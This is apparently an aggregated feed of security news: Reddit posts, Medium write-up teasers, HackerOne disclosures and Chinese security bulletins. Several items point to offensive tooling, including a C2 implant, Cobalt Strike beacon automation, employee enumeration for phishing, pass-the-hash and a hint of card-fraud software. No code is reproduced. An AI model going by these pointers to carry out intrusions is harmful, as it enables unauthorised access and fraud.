• Open

    Some high resolution "adult" pictures
    Normal NSFW "Adult" pictures. This directory is separate from the normal "Wordpress" years sub directory structure (but they do have pictures in them also). Sorted by sets by numbered sub-directories. http://bestporngallery.com/wp-content/uploads/photo-gallery/Nubiles Porn/ submitted by /u/BustaKode [link] [comments]

  • Open

    Looks like Krishna related PDF's
    As title says - Krishna related PDF's https://ebooks.iskcondesiretree.com/pdf/ submitted by /u/BustaKode [link] [comments]
    Some Moon landing vids/pics. Nice vids of some interviews.
    Mainly Moon related pictures and videos. In the sub dir "Interviews", some quality interviews (If Trump triggers you, then avoid.) http://americasuncommonsense.com/blog/wp-content/ submitted by /u/BustaKode [link] [comments]
  • Open

    In-House Platform Security Concerns
    I work for a Fortune 500 company and we recently developed and deployed an in-house platform that is solely used by employees and employees only. The platform is used every single day across the country by field specialists (on their iPads). Curious to know what kind of security risks we should look out for…if any? Yes, there is sensitive customer data stored on this platform that is accessible by the field team, corporate account team, and the IT team. submitted by /u/Limp_Help8388 [link] [comments]
    Wappalyzer Firefox plugin stores private browsing cookies. Thoughts?
    Today i noticed that a large amount of sites i opened in Private Browsing had a large amount of cookie data stored even after i closed firefox under "Cookies and Site Data" setting. I started looking into it by performing the following tests: - Cleared all the unwanted cookies from Firefox and opened a private browsing window with all my addons enabled. - Visited a bunch of random sites , closed private browsing and the cookies remained there. - Cleared the cookies again and closed Firefox. - This time i disabled all of my addons. - Did the same test with the websites and none appeared on Cookies and Site Data. Interesting. - I started enabling the plugins one by one and performed the same site test each time i enabled a plugin. - The time i enabled Wappalyzer i noticed that cookie data remained stored. What are your thoughts on this? submitted by /u/Voyaller [link] [comments]
    Weighting Matrix, how to set weights?
    Hi all 👋 i have a questionnaire assessing equipments in term of cyber resilience. Close ended questions have been approved and now I need to add weights to each questions to create the weighting matrix. My question is that i feel all questions are very critical and I feel like they are all worth maximum weight, how will I assign the weights? r/CyberResilience submitted by /u/---Agent47--- [link] [comments]
    Weird Bluetooth - Should I be concerned?
    Forgive me for any faux pas I may commit, I am a long-time lurker first time poster. I wanted to get some feedback from you all. There is a weird device that consistently shows up in all my bluetooth devices (phone, iPads, etc). We live in a house not particularly close to any neighbors, which is why I think this has to be something in my own home. Normally I wouldn't be super concerned, but the name clearly implies something more "adult" than we would have here. It's named USMEM_L_USTHOLE and that's why I'm concerned. I've tried Wunderfind and other apps but they won't let me find the source unless I am connected to it. I've also tried connecting to it, but it's never successful. Please tell me if I should be concerned about this - I keep thinking that if it's on bluetooth it has to be something very close and that is what worries me. Thank you so much for your insights!!!! ​ submitted by /u/FuzzyCow-1103 [link] [comments]
  • Open

    Small utility to chunk up a large BloodHound JSON file into smaller files for faster importing.
    submitted by /u/ustayready [link] [comments]
    mast1c0re: Part 3 – Escaping the PS5 emulator
    submitted by /u/ArbitraryWrite [link] [comments]
    Azure B2C Crypto Misuse and Account Compromise
    submitted by /u/dlorenc [link] [comments]
    chvancooten/NimPlant: A light-weight first-stage C2 implant written in Nim.
    submitted by /u/Vegetable_Treat_5017 [link] [comments]
  • Open

    mast1c0re: Part 3 – Escaping the PS5 emulator
    submitted by /u/ArbitraryWrite [link] [comments]
    Using OSINT for Free WIFI
    Check it out ! I quickly go over an osint online tool you can use to find a record of a bunch of WIFI networks near you! https://youtu.be/jHFcP1ItJgE submitted by /u/cyberducky0_0 [link] [comments]
  • Open

    Fix timing oracle in RSA decryption (CVE-2022-4304)
    Article URL: https://github.com/openssl/openssl/commit/b1892d21f8f0435deb0250f24a97915dc641c807 Comments URL: https://news.ycombinator.com/item?id=34851608 Points: 1 # Comments: 0
  • Open

    OhSINT Write-Up, TryHackMe
    For write my first write-up, I decided to do a write-up of the OhSINT machine on tryhackme, I apologize for any mistake I come to make in… Continue reading on Medium »
  • Open

    Privileges Escalation Techniques (Basic to Advanced) in Linux
    Part-5 Continue reading on Medium »
  • Open

    SecWiki News 2023-02-18 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Hacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on Bing.com
    XSS on Bing.com Continue reading on Medium »
    Out-of-bounds Read — [CWE-125]
    — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — Continue reading on Medium »
    Hack Any Computer System just with your Android Device.
    Hello learners, I hope you all are doing well. As you all have knew that today we are going to hack a computer system using our Android… Continue reading on System Weakness »
    Found an URL in the android application source code which lead to an IDOR
    I was testing the target which had its web application and mobile application in scope. Let’s say the target is example.com Continue reading on Medium »
    Out-of-bounds Write-[787]
    — — — — — — — — — — — — — — — — — — — — — — — — — — — - Continue reading on Medium »
    Bug Zero at a Glance [Week 11–17 February]
    What happened with Bug Zero? Continue reading on Bug Zero »
  • Open

    How to Create Disk Image / Mount Drive Read-Only?
    submitted by /u/IllCow9235 [link] [comments]
    How to Recover Older Windows Passwords?
    submitted by /u/IllCow9235 [link] [comments]
  • Open

    Casino Download X
    When you go online to find new games, there is no shortage of results, quite the opposite. There are so many sites and games that it can… Continue reading on Medium »

  • Open

    Lots of DOOM related stuff - Decent amount of Music - bunch of random crap
    submitted by /u/mingaminga [link] [comments]
  • Open

    Confessions of a bug bounty program manager
    In my previous article I wrote about my experiences as a top ranked bug bounty hunter. Continue reading on Medium »
    How i hack the most popular social media in 2022(broken access control)
    by Maxime Jourdan Continue reading on Medium »
    Introduction to SSRF Exploitation: A Practical Tutorial for Ethical Hackers — StackZero
    Introduction to SSRF covering its mechanics, techniques, and effective countermeasures to defend against such attacks. Continue reading on InfoSec Write-ups »
    AWS Lambda script to delete Inactive Users
    I was doing learning withing AWS and playing around with AWS lambda functions. This paritcular lambda functions utilizes boto3 library to… Continue reading on Bug Bounty Hunting »
    $$$$ IDOR’s — How to find IDORs in Ecommerce sites?
    Introduction: Continue reading on Medium »
    Stealing in motion. Immunefi bounty hunting from different ANGLE.
    When starting mentorship program with @trust__90, the first task I was given, was to do a security research of Angle Protocol — “a… Continue reading on Medium »
    Join CryptoRank Bug Bounty Campaign!
    Attention all security researchers and crypto enthusiasts! We’re excited to announce that we’re launching a bug bounty campaign on… Continue reading on Medium »
    How to Participate in a Bug Bounty Program
    Bug bounty programs have become increasingly popular in recent years as a way for companies to uncover vulnerabilities in their software… Continue reading on Medium »
  • Open

    Can a company that owns a web browser see the unencrypted HTTPS data when you visit a website?
    Can a company that owns a web browser see the unencrypted HTTPS data when you visit a website? submitted by /u/Bored-Giraffe [link] [comments]
    Help - Network hacked
    Network has been hacked along with remote access to other devices on network. Symptoms: FPS and ping lag, changes go pixels on screen and other devices, remote control of desktop pc Have previously performed fresh install of Windows. Have a unifi router, switch and ap but suffered a network outage today (am sure this was an attack) so I have now removed devices off the network and gone back to ISp provided router/modem. Planning to wipe drives using secure boot and reimage network devices (router switch and ap). Then resetuo network security/firewall and segregated network for other devices in the house. I'll be honest I'm a bit out of my depth here so I've come for help. submitted by /u/Miserable-Apricot-99 [link] [comments]
    any valid chip software??
    emv chip software submitted by /u/Balenciaga_- [link] [comments]
    need help disabling microsoft-edge-policies automatichttpsdefault
    YES, YES, YES, I KNOW HTTPS IS BETTER AND PREFERRED, however we have no control over these legacy apps that our end users use. So we have multiple sites that have various internal only web servers that are still running http instead of https. Some are vendor provided webservers others are internally created legacy applications. We noticed with an issue across all browsers (edge, Chrome, firefox) that all sites are being redirected to HTTPS URLs. End users are unable to access the sites by URL, after typing in http://exampleserver1.site.com it then redirects to https://exampleserver1.site.com if they use the server IP address http://123.123.123.123 then the web app works. The internal sites work if we roll back to prior versions of edge, chrome, firefox. We've tried testing disabling the "HTTPS-Only Mode" in Firefox, but users are still getting the same issue of the sites re-directing to https. https://support.mozilla.org/en-US/kb/https-only-prefs?as=u&utm_source=inproduct We've also tried adding in the registry key for edge but once again we are still having the same error https://learn.microsoft.com/en-us/deployedge/microsoft-edge-policies#automatichttpsdefault YES, YES, YES, I KNOW HTTPS IS BETTER AND PREFERRED, however we have no control over these legacy apps that our end users use. when looking at our Edge STIG we don't see any of the settings microsoft referenced in the above article in the most recent Edge STIG on https://www.stigviewer.com/stig/microsoft_edge/ YES, YES, YES, I KNOW HTTPS IS BETTER AND PREFERRED, however we have no control over these legacy apps that our end users use. Just wondering if anyone has run across this and if so was there an additional registry or browser setting you had to set to bypass the autohttps setting. submitted by /u/Jeeps_guns_bbq [link] [comments]
    Thoughts on the new Black Hat Certified Pentester (BCPen)?
    https://secops.group/blackhat-certified-pentester-bcpen/ I saw this yesterday when I got the Black Hat 2023 registration information. It looks interesting, but I'm curious what others think of it since it reads as a new offering with a high level of expectations without any class/training ahead of the exam. I'd like to get a pentest cert though it's not my only focus (I'm a sole analyst and mostly focused on blue) and I don't want to blow 2k on a test that I may not be fully prepared for. submitted by /u/EnterNam0 [link] [comments]
    Snort, on Windows 2019 server, receiving an error due to it trying to create a directory with an IPv6 (containing colons). How do I rectify this?
    I'm starting Snort with the following command: snort -i 4 -A console -c C:\snort\etc\snort.conf -l C:\Snort\log -K ascii But I am receiving an error on this line: Commencing packet processing (pid=16632) 02/15-09:46:36.450939 [**] [129:12:1] Consecutive TCP small segments exceeding threshold [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} ab12:0000:0000:0000:789a:0a64:acab:8440:63332 -> ab12:0000:0000:0000:789a:0a64:acab:8440:5432 ERROR: OpenLogFile() => mkdir(C:\Snort\log/ab12:0000:0000:0000:789a:0a64:acab:8440) log directory: Invalid argument Fatal Error, Quitting.. ​ I have found two links that say it's due to the colon in the potential directory name, but have not found anything that says what to do about it. ​ EDIT: I think I just figured it out... after 2 days of looking, I realized that the "-i 4" was based on a different server and on this server it should be "-i 1" for "Ethernet adapter Public" submitted by /u/PCI_Questions [link] [comments]
    Can and do Google employees look at your chrome HTTPS data in its unencrypted form?
    Can and do Google employees look at your chrome HTTPS data in its unencrypted form? submitted by /u/Bored-Giraffe [link] [comments]
  • Open

    Bypass invite accept for victim
    Slack disclosed a bug submitted by analyz3r: https://hackerone.com/reports/1663361 - Bounty: $1500
    View thumbnail of any private video (friends or followers only) of Private/Public account
    TikTok disclosed a bug submitted by amans: https://hackerone.com/reports/1498353 - Bounty: $500
    Multiple OpenSSL error handling issues in nodejs crypto library
    Node.js disclosed a bug submitted by mjones-vsat: https://hackerone.com/reports/1808596
  • Open

    Is there a way to create a Cobalt Strike beacon with Python?
    I am working on this automation project and I am seeking a way to creating a cobalt strike beacon through a python script. I am trying to minimize the amount of user intervention involved in the process, I don't want to interact with the GUI for it. submitted by /u/baronobeefdip2 [link] [comments]
    SSH Tunneling Shenanigans
    In this weeks red team tip. I show examples of how to port RDP through an SSH tunnel. I also show SSH Control Sequences a way to do this you may have not seen before. SSH Tunneling Shenanigans submitted by /u/Infosecsamurai [link] [comments]
    What exploit testing tools do you use to figure out what the vulnerabiities are?
    I understand that people use exploit databases like exploit-db but what tools do you use to detect what the exploits are without breaking the system? submitted by /u/Conchoidally [link] [comments]
    WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks
    submitted by /u/dmchell [link] [comments]
    Checkout this cool attack tool developed in powershell for testing Azure AD and Microsoft 365 security.
    submitted by /u/openrecon [link] [comments]
  • Open

    Fuzzing integration enables security testing in Jest
    Article URL: https://twitter.com/KhaledYakdan/status/1626220906606477313 Comments URL: https://news.ycombinator.com/item?id=34836425 Points: 2 # Comments: 0
    Curl Audit: How a Joke Led to Significant Findings: – Fuzzing Weekly CW7
    Article URL: https://old.reddit.com/r/fuzzing/comments/114gbdl/curl_audit_how_a_joke_led_to_significant_findings/ Comments URL: https://news.ycombinator.com/item?id=34832956 Points: 2 # Comments: 0
  • Open

    SecWiki News 2023-02-17 Review
    2022年全球国防网络空间情况综述(网军建设篇-下) by ourren 2022年全球国防网络空间情况综述(网军建设篇-上) by ourren 网络流量异常检测综述 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-17 Review
    2022年全球国防网络空间情况综述(网军建设篇-下) by ourren 2022年全球国防网络空间情况综述(网军建设篇-上) by ourren 网络流量异常检测综述 by ourren 更多最新文章,请访问SecWiki
  • Open

    How we Hacked Apple Twice in one day for Fun (and Profit)
    submitted by /u/pectoral [link] [comments]
    Ghidra Golf: A Reverse Engineering CTF
    submitted by /u/DLLCoolJ [link] [comments]
    Introducing Proxy Enriched Sequence Diagrams (PESD). New Burp Plugin.
    submitted by /u/nibblesec [link] [comments]
    Reinforcement learning for red/blue team automation
    submitted by /u/limmen [link] [comments]
    CVE-2023-20032: ClamAV Remote Code Execution (CVSS 9.8)
    submitted by /u/qwerty0x41 [link] [comments]
  • Open

    Daily Blog
    Is there a daily DFIR blog you read? What about your favorite cybersecurity blog that maybe you don't read everyday, but you find to be very educational? ​ What do you guys think of the Internet Storm Center blog? Cheers! submitted by /u/DeadBirdRugby [link] [comments]
    Spotlight Inspector download?
    I'm aware this seemingly marvelous tool was acquired by Blackbag Technologies: 504ENSICS Labs announced a tool, Spotlight Inspector, that parsed the Spotlight metadata store database (store.db) offline, on several examination systems. This was the first record of the database being successfully reverse engineered. However, a note on the 504ENSICS website states that the Spotlight Inspector intellectual property has been acquired by Blackbag Technologies, Inc. As such, 504ENSICS Labs no longer offers direct free downloads of the tool. Today, this tool is no longer available nor was their methodology, results or analysis of the database structure published or made publicly available. It is unknown if the tool was able to recover deleted records or parse the content for these records. I'm sure someone downloaded it and might still have it around. Though Spotlight may have changed over the years, as recently as 2019, it appears the tool still worked. Does anyone have a copy they are willing to share? 🥺 ::EDIT:: Yes, I have used Spotlight Parser, and it's not bad. But hoping to give something else a try. submitted by /u/GuidoZ [link] [comments]
  • Open

    cURL Audit: How a Joke Led to Significant Findings: — Fuzzing Weekly CW7
    cURL Audit: How a Joke Led to Significant Findings… Continue reading on Medium »
  • Open

    cURL Audit: How a Joke Led to Significant Findings: — Fuzzing Weekly CW7
    cURL Audit: How a Joke Led to Significant Findings… Continue reading on Medium »
  • Open

    FreeBuf 周报 | 黑客仍在利用已修复的Exchange漏洞;PyPI Python软件包存在恶意代码
    文章总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    值得警惕,攻击者仍在利用已修复的Exchange漏洞
    攻击者利用被跟踪为CVE-2021-34473和CVE-2021-34523的ProxyShell漏洞来获得对目标网络的初始访问权限。
    靶场笔记-HTB Soccer
    Hack The Box实战靶场,Soccer靶机,HTB官方评级为Easy,涉及知识点:文件上传漏洞,websocket接口sql注入,suid提权等
    蜜罐的新玩法:无与伦比的洞察力,独特的威胁情报
    国内蜜罐千千万,想和大家讨论一些不同的蜜罐产品,吸引更多的人关注这类蜜罐市场。
    Mirai 恶意软件新变种感染 Linux 设备,以期构建 DDoS 僵尸网络
    安全研究人员指出,新变种“V3G4”很可能向希望对特定网站或在线服务发动网络攻击的客户出售 DDoS 服务。
    (ISC)2:全球经济衰退的大环境下,对网络安全岗位影响最低
    只有 10% 的企业高管预计将在 2023 年解雇网络安全团队成员,这一比例远低于其他行业。
    FB 赠书第 95 期 | 逆向宝典《Ghidra权威指南》在等你!
    国内关于 Ghidra 的知识很零散,不利于系统学习,不用担心!《Ghidra权威指南》可以帮助你。
    黑化AI,将恶意“注入”ChatGPT
    把恶意“注入”ChatGPT,会产生哪些后果?独到视角解析ChatGPT潜在风险,亚信安全网络安全研究院最新研判详细呈现。
  • Open

    Show HN: Archer – open-source distributed network and vulnerability scanner
    Article URL: https://github.com/taythebot/archer Comments URL: https://news.ycombinator.com/item?id=34831499 Points: 2 # Comments: 0
  • Open

    Citrix CVE-2022-27518 漏洞分析
    作者:hanwang@知道创宇404实验室 日期:2023年2月17日 漏洞介绍 Citrix在2022年12月份发布了CVSS评分9.8的CVE-2022-27518远程代码执行漏洞通告,距今已经过去两个多月了,由于漏洞环境搭建较为复杂,一直没有相关的分析文章。经过一段时间的diff分析及验证后,发现漏洞成因在于Citrix netscaler在解析SAML xml时对SignatureV...
  • Open

    Citrix CVE-2022-27518 漏洞分析
    作者:hanwang@知道创宇404实验室 日期:2023年2月17日 漏洞介绍 Citrix在2022年12月份发布了CVSS评分9.8的CVE-2022-27518远程代码执行漏洞通告,距今已经过去两个多月了,由于漏洞环境搭建较为复杂,一直没有相关的分析文章。经过一段时间的diff分析及验证后,发现漏洞成因在于Citrix netscaler在解析SAML xml时对SignatureV...
  • Open

    WhatsApp crash codes?
    Hi, I just read about WhatsApp crash codes. Is this still a thing in 2023? submitted by /u/liquid_nitr0gen [link] [comments]

  • Open

    What are the countries with the best paid/best quality entry-level cybersecurity jobs?
    Hello everyone! I'm in a point in life where I have total flexibility to go whatever direction I want so I was wondering what are the best countries to start a cybersecurity career. I'm a European Union citizen, quite new to cybersecurity (and by no means a seasoned expert), but I also have a few years experience in other type of positions in tech companies, so not really a totally inexperienced worker either. My main priorities are a good salary and also (even if it's later down the road) the possibility to work mostly remote and with flexible schedules. I have a preference for being based in Europe but I'm flexible with that too. Single with no kids and no kind of debt so no constraints on that side either. What are the salaries and job conditions like where you live and what would you say are the best places to start a career? What could be the potential salaries for someone like me? Info about me: - A BSc in engineering - A MSc in cybersecurity - A 6 month internship in a mid-size cybersecurity consultancy firm (mostly pentesting) - 4 years experience in another tech company (one of the big ones), not related to cybersecurity (most of this time I was managing a tech support team but my job was not really technical) - I speak 3 languages, including fluent English and Spanish. - Tons of international experience, studied/worked in different countries for long periods of time. Thanks everyone for the help! submitted by /u/BroX111 [link] [comments]
    Best fuzzer for TCP-based JSON interface?
    There are so many options out there for network fuzzing, like Boofuzz, AFLNET, Scapy, etc. I would like to fuzz a local server application that exposes a TCP port that communicates mainly in JSON. Anyone knows what's the state of art approach for that? Generally, is there any resource out there comparing the myriad options available for network fuzzing and is relatively recent? submitted by /u/jafarlihi [link] [comments]
    How to pick a security framework to align to? NIST CSF/800-53, ISO 27001?
    So we complete SOC 2 audits annually along with a 3rd party security firm that audits us. I am working on finding a good GRC tool to help with things but also want to align with a framework and not sure how/which one to pick. submitted by /u/junkaccount1999 [link] [comments]
    Looking for guidance regarding cloud certs
    Hey everyone! Im currently working as a netsec engineer and mainly deal with Firewalls in my day to day business. I recently passed the OSCP because I want to get into Pentesting at some point in the future. My employee asked me recently if Im interested in cloud security and since its one of my weak points, I want to dedicate more time this year to learn and understand how AWS/Azure/GCP work. This could benefit me to deploy firewalls for customers, understand networking in cloud infrastructures and also if I do find a job as a penetration tester. Im really a potato when it comes to cloud and apart from setting up a vm I dont really have any knowledge. My guess is that I should focus on one cloudvendor and then Ill be able to at least find my way through the others? If so, which one would you recommend and why? My plan would then be to first take a beginner course/cert followed up by one which focuses on security. Do you know which courses/certs could help me in achieving? Thank you very much, any advice is appreciated submitted by /u/ConzT [link] [comments]
    Risks of malware/spyware/keyloggers on Chinese devices - any mitigation possible?
    So I have been eyeing on some small laptops/handhelds from Chinese vendors like GPD and Onemix, and now the Ayaneo 2. But I'm concerned about keyloggers, spyware, and other malware that could be potentially used to steal credentials being shipped with these devices. There are some articles about this topic that involves Huawei/Oppo/Xiaomi phones. I could probably remedy that by doing a fresh install of Windows and not installing any of the manufacturer utilities or drivers... But then, what are the chances that malware could persist in between installs, perhaps at the firmware level, abuse of the Windows Platform Binary Table, manufacturer drivers delivered via windows update, or some other method? submitted by /u/Secepatnya [link] [comments]
    Decentralized, Peer-To-Peer Encryption
    I do not have an IT background but enjoy computers and HUGE believer in protecting personal data and privacy against the government, corporations, basically anyone. I'm wondering if this exists and hope I explain this correctly. Is there such thing as a decentralized, peer-to-peer encryption for a chat app/instant messaging? Meaning no single server will hold or record what is being sent between users as a true form of anonymous communication? Similar to bitcoin, what if there was a cryptocurrency that awarded miners for lending their processing power to randomly encrypt peer-to-peer messages. Instead of funneling the message data through a single node or computer, breaking the encrypted message into 3, 5, 7, 10 different packets that are routed through the network of computers used for "mining" then sent to the end user as the intended recipient? I believe something like this on top of a VPN and Tor would make it nearly impossible to track. Plus, if it was operating independently through decentralization, then nobody could log or backdoor the service. My issue is most of the services like WhatsApp or Signal log all your information and gladly had it over as soon as the government comes knocking. Does something like this exist? Is it even possible to have a truly anonymous chat online anymore? submitted by /u/hfh7dc [link] [comments]
  • Open

    Outdated Default AWS IAM Policy Language Versions | CloudQuery
    submitted by /u/jsonpile [link] [comments]
    No More Access Denied - I Am the TrustedInstaller
    submitted by /u/achilles4828 [link] [comments]
    [BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB
    submitted by /u/poltess0 [link] [comments]
    Secure Boot to Heads: A brief history of #Linux Boot Integrity
    submitted by /u/maltfield [link] [comments]
    Researcher infiltrates phishing syndicate to learn TTP's
    submitted by /u/CyberArkLabs [link] [comments]
  • Open

    Low authorization level at server side API operation e2e.updateGroupKey, let an attacker break the E2E architecture.
    Rocket.Chat disclosed a bug submitted by f0ns1: https://hackerone.com/reports/1757663
  • Open

    The barrier for skiddes is too damn low
    I present to you this lazy and unskilled individual with poor opsec, lolminerxmrig. Continue reading on Medium »
    OhSINT TryHackMe —A detailed writeup
    An OSINT challenge to figure out a password, SSID of a WAP, and more from just a photo. (Note: This is not a real-life example) Continue reading on Medium »
    Holy HIMARS! How a single Artillery system changed the tide of the UA war.
    We’re continuing our ongoing analysis of the current European conflict and the systems, people and decisions that have been able to… Continue reading on Medium »
    Hello
    Hello world! We are busy building the first human risk and continuous monitoring platform. If you are interested in being added to our… Continue reading on Medium »
  • Open

    OSINT: Enumerating Employees on LinkedIn and Xing
    Hi r/redteamsec, I've mangled with the unofficial LinkedIn and Xing API to retrieve employee information of company pages. Works good so far and may be helpful during red team assessments or phishing. I've also implemented a feature to automatically create a user's email address based on the dumped firstname and lastname. Just choose your prefered email layout via the cli param and you're good to go. Docker images are readily available on Dockerhub. Note: Since users are free to define their name and we are not using the official APIs, the retrieved data can be bogus at some occurences. For example if users append their pronouns, a specific salutation or certificate abbreviations. The scripts filter out some stuff already though. Here the scripts on GitHub: https://github.com/l4rm4nd/LinkedInDumper https://github.com/l4rm4nd/XingDumper Use responsibly. Cheers! submitted by /u/sk1nT7 [link] [comments]
  • Open

    FAT32 drive
    I'm looking at a USB in FTK Imager which was formatted in FAT32. There's a folder with a bunch of deleted files that all show an identical date modified timestamp. Would this point to the possible mass deletion time? submitted by /u/internal_logging [link] [comments]
  • Open

    Linux vs Windows exploit Dev
    Hi everyone, I was thinking about possibly taking the OSED https://www.offensive-security.com/courses/exp-301/ for windows exploit Dev. However, since I'm much more familiar with Linux these days I was wondering whats the pros and cons of doing exploit Dev work on each platform. To start off with, I believe I need to narrow my focus and then branch out. Any advice I'd greatly appreciate it, thanks. submitted by /u/_W0z [link] [comments]
    Do you know any gnu/linux security researcher's blogs?
    I'm looking for blogs where I can read write-ups on how to find and exploit vulnerabilities in real world C programs, not ctfs submitted by /u/wlo1337 [link] [comments]
  • Open

    DHS warns iPhone users to change settings over zero-day vulnerability
    Article URL: https://www.theepochtimes.com/federal-agency-warns-millions-of-iphone-users-to-change-settings-now_5059459.html Comments URL: https://news.ycombinator.com/item?id=34820946 Points: 3 # Comments: 4
    Health info for 1M patients stolen using critical GoAnywhere vulnerability
    Article URL: https://arstechnica.com/information-technology/2023/02/goanywhere-vulnerability-exploit-used-to-steal-health-info-of-1-million-patients/ Comments URL: https://news.ycombinator.com/item?id=34818898 Points: 2 # Comments: 0
  • Open

    SecWiki News 2023-02-16 Review
    某 T 路由器固件解压缩探秘 by 路人甲 Java反序列化预备全知 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-16 Review
    某 T 路由器固件解压缩探秘 by 路人甲 Java反序列化预备全知 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Simplify Your Web Application Testing with These Python Snippets
    In this blog post, I’ll share some helpful Python snippets that you can use to streamline your testing process and make your life easier… Continue reading on Medium »
    The Inside Story of Finding a Reverse Transaction Vulnerability in a Financial Application
    Hello everyone, my name is Raja Uzair Abdullah and I’m an Application Security Engineer. With my focus on penetration testing and bug… Continue reading on Medium »
    XSS on The MOST Popular Movie Ticket website.
    Hi all, Continue reading on Medium »
  • Open

    BOFs for Script Kiddies
    Introduction I hope I don’t sound like a complete n00b, but what or who or where is a BOF? All the cool kids are talking about it, and I just smile and nod. Is he the newest Crypto billionaire, or is a meetup for like-minded hackers, or is it some other 1337 slang? I understand... The post BOFs for Script Kiddies appeared first on TrustedSec.
  • Open

    HTB | Photobomb | Walkthrough
    No content preview
    Banking Trojan Analysis
    No content preview
    Have a safe flight (hacking the boarding pass)
    No content preview
    Top Paid Cybersecurity Affiliate Programs To Earn Passive Income
    In this article, we will see what are the top paid cyber security affiliate programs from where you can earn easy passive income and… Continue reading on InfoSec Write-ups »
    Bypass Jailbreak Detection in Flutter apps
    If you ever worked on a mobile Flutter application for a big company, or if you ever needed to treat your users’ personal data carefully… Continue reading on InfoSec Write-ups »
    TypoSquatting Malware Analysis
    No content preview
    The Dark Side of Social Media: Understanding and Protecting Yourself from Social Engineering…
    No content preview
    Securing the Cloud: Best Practices for Protecting Your Data in the Cloud
    No content preview
    A tale of a full Business Takeover — Red Team Diaries
    No content preview
    Reverse Engineering — An Overview
    No content preview
  • Open

    HTB | Photobomb | Walkthrough
    No content preview
    Banking Trojan Analysis
    No content preview
    Have a safe flight (hacking the boarding pass)
    No content preview
    Top Paid Cybersecurity Affiliate Programs To Earn Passive Income
    In this article, we will see what are the top paid cyber security affiliate programs from where you can earn easy passive income and… Continue reading on InfoSec Write-ups »
    Bypass Jailbreak Detection in Flutter apps
    If you ever worked on a mobile Flutter application for a big company, or if you ever needed to treat your users’ personal data carefully… Continue reading on InfoSec Write-ups »
    TypoSquatting Malware Analysis
    No content preview
    The Dark Side of Social Media: Understanding and Protecting Yourself from Social Engineering…
    No content preview
    Securing the Cloud: Best Practices for Protecting Your Data in the Cloud
    No content preview
    A tale of a full Business Takeover — Red Team Diaries
    No content preview
    Reverse Engineering — An Overview
    No content preview
  • Open

    HTB | Photobomb | Walkthrough
    No content preview
    Banking Trojan Analysis
    No content preview
    Have a safe flight (hacking the boarding pass)
    No content preview
    Top Paid Cybersecurity Affiliate Programs To Earn Passive Income
    In this article, we will see what are the top paid cyber security affiliate programs from where you can earn easy passive income and… Continue reading on InfoSec Write-ups »
    Bypass Jailbreak Detection in Flutter apps
    If you ever worked on a mobile Flutter application for a big company, or if you ever needed to treat your users’ personal data carefully… Continue reading on InfoSec Write-ups »
    TypoSquatting Malware Analysis
    No content preview
    The Dark Side of Social Media: Understanding and Protecting Yourself from Social Engineering…
    No content preview
    Securing the Cloud: Best Practices for Protecting Your Data in the Cloud
    No content preview
    A tale of a full Business Takeover — Red Team Diaries
    No content preview
    Reverse Engineering — An Overview
    No content preview
  • Open

    信息泄露渠道及风险感知;数据脱敏规则探讨 | FB甲方群话题讨论
    大规模信息泄露,企业如何增强数据泄露风险的感知?数据脱敏一般规则可以如何制定?面向公司全员的安全考核应该怎么做?
    FreeBuf早报 | 瑞典最大电视广播公司遭攻击瘫痪;汉莎航空IT故障数千旅客滞留
    当地时间15日消息,德国航空公司汉莎航空(Lufthansa)的IT故障导致整个集团航空公司的航班延误和中断,全球数千名乘客被困。
    谷歌在安卓13设备上推出隐私沙盒测试版,以更好的保护用户隐私
    谷歌本周二宣布,它正式向运行Android 13的移动设备推出Android隐私沙盒测试版。
    CC1打不通时的另外一条链CC3
    在CC1和CC6中,我们最终弹计算器都是通过Runtime.exec进行调用,从CC3我们要介绍一种不通过Runtime来弹计算器的方法,也就是Java中常提到的动态类加载.。
    现代和起亚汽车爆出逻辑漏洞,只需一根 USB 线即可开走汽车
    预估有 380 万辆现代汽车和 450 万辆起亚汽车收到影响。
    2023网络安全十大发展趋势
    2023年,网络安全行业将更加注重核心关键技术攻关,以重点产业带动网络新兴产业发展,促进网络安全自主技术的广泛应用,网络安全产业蓬勃发展的势头将继续保持。
    感受 Vue3 的魔法力量
    摆脱了书写声明式的代码,用起来很流畅,提升不少效率,封装可复用逻辑,将 UI 和逻辑分离,提高复用性,view 层代码展示更清晰,少去了很多配置,使用起来更便捷
  • Open

    An archive of all the >2900 save files on WiiSave.com, which died 8 years ago, are now on Google Drive.
    submitted by /u/zuperfly [link] [comments]
    Biology diagrams, mostly of proteins
    https://www.proteinsynthesis.org/wp-content/uploads/2013/02/ submitted by /u/Glad-Line [link] [comments]
  • Open

    HACKING LAZYADMIN [TryHackMe] : CTF CHALLENGE
    Good to have you back Hacker ! For a little warm-up we are going to hack into an easy level machine called LazyAdmin. At least, we get to… Continue reading on Medium »

  • Open

    Invoke-GMSAPasswordReader
    submitted by /u/v1brio [link] [comments]
  • Open

    Pass the Hash to Katz!
    Welcome weary web-travelers! This blog covers the basics of “Passing the Hash” using Mimikatz. This exercise was completed during my Cyber… Continue reading on Medium »
    AWSGoat(ine) AWS CTF solution Module 2
    Hi readers, here we will be solving AWSGoat Module 2 (https://github.com/ine-labs/AWSGoat) Continue reading on Medium »
    The Advantages of AI-Powered Cyber Security Tools
    As cyber threats continue to evolve and become more sophisticated, cyber security experts are turning to artificial intelligence (AI)… Continue reading on Medium »
  • Open

    ACE Exam Help
    Is there any possible way to access a full version of FTK to take this? I used my first try on just the imager and failed because many questions need the full version. submitted by /u/teemogangg [link] [comments]
    Dabatases in Axiom
    Does anyone analyse databases inside of Axiom? Is that even possible or am I missing something? I can find the .db by going through the File System option in Axiom, but after testing belkasoft, viewing databases was smooth compared to Axiom. I’ve tested both tools with the same dataset and it was two different experiences. Tl;dr: Looking to heard your options when it comes to Axiom and databases. submitted by /u/agente_99 [link] [comments]
  • Open

    ClamAV 0.103.8, 0.105.2 and 1.0.1 patch versions published
